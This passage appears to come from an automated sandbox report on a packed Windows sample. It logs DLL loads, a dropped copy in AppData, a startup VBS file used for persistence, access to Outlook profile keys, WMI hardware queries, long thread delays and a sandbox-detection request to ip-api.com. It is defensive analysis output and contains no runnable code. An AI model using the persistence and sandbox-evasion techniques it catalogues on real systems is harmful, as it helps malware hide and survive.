                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exe    Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe    Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: wntdll.pdbUGP source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00F98070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F98070
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EE8719 push FFFFFF8Bh; iretd 0_2_00EE871B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EAE94F push edi; ret 0_2_00EAE951
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EAEA68 push esi; ret 0_2_00EAEA6A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EA8B85 push ecx; ret 0_2_00EA8B98
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EAEC43 push esi; ret 0_2_00EAEC45
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EAED2C push edi; ret 0_2_00EAED2E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_005B8719 push FFFFFF8Bh; iretd 1_2_005B871B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_0057E94F push edi; ret 1_2_0057E951
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_0057EA68 push esi; ret 1_2_0057EA6A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_00578B85 push ecx; ret 1_2_00578B98
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_0057EC43 push esi; ret 1_2_0057EC45
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_0057ED2C push edi; ret 1_2_0057ED2E
                    Source: initial sample    Static PE information: section name: UPX0
                    Source: initial sample    Static PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    File created: C:\Users\user\AppData\Local\seskin\troopwise.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00F055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F055FD
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_00554A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00554A35
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Code function: 1_2_005D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_005D55FD
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Code function: 0_2_00EA33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA33C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe    Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match    File source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
                    Source: Yara match    File source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
                    Source: global traffic    HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    API/Special instruction interceptor: Address: FE2A84
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exe    API/Special instruction interceptor: Address: 1812A5C
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599510
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599404
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 598078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597637
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597296
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597161
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 597031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596483
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596369
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe    Thread delayed: delay time: 596156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595059Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594720Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594426Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598450Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598341Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598194Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597686Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595589Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595191Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594930Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594807Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594668Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593797Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2301Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7545Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2311Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7542Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeAPI coverage: 4.5 %
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeAPI coverage: 4.8 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B4696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_005B4696
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC93C FindFirstFileW,FindClose,1_2_005BC93C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005BC9C7
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF200
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF35D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BF65E
